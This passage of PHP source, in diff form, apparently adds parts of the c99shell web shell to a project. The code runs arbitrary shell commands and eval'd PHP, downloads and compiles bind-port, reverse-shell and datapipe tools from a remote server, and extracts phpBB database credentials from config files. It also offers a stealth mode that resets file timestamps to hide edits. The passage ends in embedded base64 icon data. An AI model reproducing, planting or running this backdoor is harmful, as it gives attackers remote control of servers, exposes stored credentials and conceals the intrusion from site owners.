    ";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "Archivation errors:
    ".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps -aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + echo "Result of execution this command:
    "; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + @chdir($olddir); + } + else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} + echo "


     Display in text-area 
    "; +} +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "
    Can't open folder (".htmlspecialchars($d).")!
    ";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "Name"; + $row[] = "Size"; + $row[] = "Modify"; + if (!$win) + {$row[] = "Owner/Group";} + $row[] = "Perms"; + $row[] = "Action"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = ""; + $y .= "\"".($parsesort[1]"; + $row[$k] .= $y; + for($i=0;$i".$row[$i]."";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = ""; $r[3] = "";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = " [".$disppath."]"; + } + else + { + $type = "DIR"; + $row[] = " [".$disppath."]"; + } + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = " ".$disppath.""; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "".view_perms_color($v).""; + if ($o == ".") {$checkbox = ""; $i--;} + else {$checkbox = "";} + if (is_dir($v)) {$row[] = "\"Info\" ".$checkbox;} + else {$row[] = "\"Info\" \"Change\" \"Download\" ".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + // Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "
    Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):

    "; + foreach($table as $row) + { + echo "\r\n"; + foreach($row as $v) {echo "\r\n";} + echo "\r\n"; + } + echo "
    ".$v."

    + +    + "; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "                   "; + } + echo " 

    "; + echo ""; + } +} +if ($act == "tools") +{ + $bndportsrcs = array( + "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"), + "c99sh_bindport.c"=>array("Using C","%path %port %pass") + ); + $bcsrcs = array( + "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"), + "c99sh_backconn.c"=>array("Using C","%path %host %port") + ); + $dpsrcs = array( + "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), + "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") + ); + if (!is_array($bind)) {$bind = array();} + if (!is_array($bc)) {$bc = array();} + if (!is_array($datapipe)) {$datapipe = array();} + + if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} + if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} + + if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} + if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} + + if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} + if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} + if (!empty($bindsubmit)) + { + echo "Result of binding port:
    "; + $v = $bndportsrcs[$bind["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
    ";} + else + { + $w = explode(".",$bind["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%port",$bind["port"],$v[1]); + $v[1] = str_replace("%pass",$bind["pass"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} + else {echo "Binding... ok! Connect to ".getenv("SERVER_ADDR").":".$bind["port"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
    View binder's process
    ";} + } + echo "
    "; + } + } + if (!empty($bcsubmit)) + { + echo "Result of back connection:
    "; + $v = $bcsrcs[$bc["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + else + { + $w = explode(".",$bc["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%host",$bc["host"],$v[1]); + $v[1] = str_replace("%port",$bc["port"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...
    "; + } + } + } + if (!empty($dpsubmit)) + { + echo "Result of datapipe-running:
    "; + $v = $dpsrcs[$datapipe["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
    ";} + else + { + $srcpath = $tmpdir.$datapipe["src"]; + $w = explode(".",$datapipe["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]); + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]); + $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]); + $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";} + else {echo "Running datapipe... ok! Connect to ".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
    View datapipe process
    ";} + } + echo "
    "; + } + } + ?>Binding port:
    Port: "> Password: ">  
    +Back connection:
    HOST: "> Port: ">  
    +Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p "!

    +Datapipe:
    HOST: "> Local port: ">  
    Note: sources will be downloaded from remote server.Processes:

    "; + if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "Can't execute \"".$handler."\"!";} + else + { + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i".$head[$i]."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo "
    "; + foreach($tab as $i=>$k) + { + echo ""; + foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "";} + echo ""; + } + echo "
    ".$v."
    "; + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "Result of execution this PHP-code:
    "; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + } + else + { + if ($eval_txt) + { + echo "
    "; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = TRUE;}} + echo "


     Display in text-area 
    "; +} +if ($act == "f") +{ + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "
    Permision denied (".htmlspecialchars($d.$f).")!
    ";} + else {echo "
    File does not exists (".htmlspecialchars($d.$f).")!
    Create
    ";} + } + else + { + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("","info"), + array("","html"), + array("","txt"), + array("Code","code"), + array("Session","phpsess"), + array("","exe"), + array("SDB","sdb"), + array("","img"), + array("","ini"), + array("","download"), + array("","notepad"), + array("","edit") + ); + echo "Viewing file:     ".$f." (".view_size(filesize($d.$f)).")      ".view_perms_color($d.$f)."
    Select action/file-type:
    "; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " ".$t[0]."";} + elseif ($t[1] == $ft) {echo " ".$t[0]."";} + else {echo " ".$t[0]."";} + echo " (+) |"; + } + echo "
    "; + if ($ft == "info") + { + echo "Information:"; + if (!$win) + { + echo "
    Path ".$d.$f."
    Size ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "
    Perms".view_perms_color($d.$f)."
    Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
    Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

    "; + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} + else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000
    "; + $a1 = ""; + $a2 = ""; + for ($i=0; $i";} + $a1 .= "
    "; + $a2 .= "
    "; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."
    ";} + echo "
    ".$a0."".$a1."".$a2."

    "; + } + $encoded = ""; + if ($base64 == 1) + { + echo "Base64 Encode
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "Base64 Encode + Chunk
    "; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "Base64 Encode + Chunk + Quotes
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "
    "; + } + if (!empty($encoded)) + { + echo "

    "; + } + echo "HEXDUMP: [Full] [Preview]
    Base64: +
    [Encode +[+chunk +[+chunk+quotes +[Decode +

    "; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {c99shexit();} + } + elseif ($ft == "txt") {echo "

    ".htmlspecialchars($r)."
    ";} + elseif ($ft == "ini") {echo "
    "; var_dump(parse_ini_file($d.$f,TRUE)); echo "
    ";} + elseif ($ft == "phpsess") + { + echo "
    ";
    +   $v = explode("|",$r);
    +   echo $v[0]."
    "; + var_dump(unserialize($v[1])); + echo "
    "; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "Execute file:

    Display in text-area
    "; + } + elseif ($ft == "sdb") {echo "
    "; var_dump(unserialize(base64_decode($r))); echo "
    ";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "phpBB configuration is detected in this file!
    "; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "Connect to DB

    ";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} + echo "Parameters for manual connect:
    "; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";} + echo "

    "; + } + } + echo "
    "; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {c99shexit();} + echo "
    "; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + $inf = getimagesize($d.$f); + if (!$white) + { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "
    Size: "; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { + echo ""; + if ($imgsize != $v ) {echo $v;} + else {echo "".$v."";} + echo "   "; + } + echo "

    "; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "Can't write to file!";} + else + { + echo "Saved!"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "
      
    "; + } + elseif (!empty($ft)) {echo "
    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";} + else {echo "
    Unknown extension (".$ext."), please, select type manually.
    ";} + } +} +} +else +{ + @ob_clean(); + $images = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". 